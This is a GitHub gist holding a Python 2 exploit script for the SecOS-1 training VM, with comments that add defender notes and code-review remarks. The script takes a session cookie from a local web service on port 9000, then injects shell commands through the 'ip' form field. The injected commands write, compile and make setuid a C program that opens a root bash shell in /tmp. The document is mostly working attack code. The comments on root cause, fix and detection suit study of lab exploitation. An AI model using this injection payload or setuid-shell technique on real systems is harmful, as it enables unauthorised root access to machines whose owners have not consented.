@itsecurityco
Last active August 29, 2015 14:25
SecOS-1 Local Privilege Escalation Exploit
#!/usr/bin/env python
# Author: Juan (@itsecurityco)
import socket
from re import search
from uuid import uuid4
from time import sleep
# Proof-of-concept for a command-injection flaw in the SecOS-1 training VM's
# web service: the value of the `ip` form field is evidently interpolated into
# a shell command on the server, so a value carrying shell metacharacters runs
# attacker-chosen commands there. Python 2 syntax throughout (print statements,
# uuid4().get_hex()).
#
# Defender's notes: the root cause is untrusted input reaching a shell. The
# server-side fix is to validate the field as an address (e.g. with the
# ipaddress module) and invoke the tool with an argv list and no shell.
# Signals worth alerting on: POST bodies whose `ip` field contains `;`, quotes
# or `>`, the web-service user spawning gcc, and new setuid files under /tmp.
HOST = '127.0.0.1'  # the VM's web service, reached locally
PORT = 9000
# Random 10-hex-char name for the dropped source file and binary under /tmp.
FILENAME = str(uuid4().get_hex().upper()[0:10])

s = None
# Try each address family / socket type resolved for HOST:PORT until one
# connects; leaves s as None if none does.
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
    af, socktype, proto, canonname, sa = res
    try:
        s = socket.socket(af, socktype, proto)
    except socket.error as msg:  # msg is bound but never used
        s = None
        continue
    try:
        s.connect(sa)
    except socket.error as msg:  # msg is bound but never used
        s.close()
        s = None
        continue
    break
if s is None:
    print '[!] Could not open socket'
    # NOTE(review): `sys` is never imported in this file, so this line raises
    # NameError instead of exiting with status 1.
    sys.exit(1)

# Fetch the landing page only to harvest the session cookie the app sets.
print "[*] Getting Set-Cookie..."
s.sendall("GET / HTTP/1.1\r\nHost: %s:%d\r\n\r\n" % (HOST,PORT))
# Single 1024-byte recv: assumes the Set-Cookie header arrives in the first
# chunk of the response.
data = s.recv(1024)
# Greedy match up to the last `;` on the header line.
m = search("Set-Cookie: (.*);",data)
# Drops the last 8 characters of the captured value -- presumably a trailing
# cookie attribute the greedy group also swallowed; cannot be confirmed here.
cookie = m.group(1)[:-8]
print "[*] Cookie: %s" % cookie

# The injected value: a plausible address plus a ping-style `-w1` argument,
# then `;` ends the intended command and the remainder is executed by the
# target's shell. Whether the `chown root` / `chmod 4777` steps actually
# succeed depends on the privilege the injected command runs with, which this
# script does not establish.
payload = "127.0.0.1 -w1;echo 'main(){setuid(0);setgid(0);system(\"/bin/bash\");}'>/tmp/%s.c;gcc /tmp/%s.c -o /tmp/%s;sleep 5;chown root /tmp/%s;chmod 4777 /tmp/%s; id" % (FILENAME, FILENAME, FILENAME, FILENAME, FILENAME)

# Hand-built HTTP/1.1 POST carrying the payload as the `ip` form field on the
# harvested session cookie. Note Content-Length counts only the payload, not
# the `ip=` prefix, so the declared length is 3 bytes short of the body sent.
req = "POST / HTTP/1.1\r\n"
req += "Host: %s:%d\r\n" % (HOST,PORT)
req += "Cookie: %s\r\n" % cookie
req += "Connection: keep-alive\r\n"
req += "Content-Type: application/x-www-form-urlencoded\r\n"
req += "Content-Length: %d\r\n" % len(payload)
req += "\r\n"
req += "ip=%s" % payload
print "[*] Sending payload: %s" % payload
s.sendall(req)
data2 = s.recv(1024)  # response is read but never inspected
s.close()
# Fixed delay to allow the injected compile/sleep sequence on the target to
# finish before the user is told where the result was written.
print "[*] Wait for 10 seconds..."
sleep(10)
print "[!] Run /tmp/%s to get root shell" % FILENAME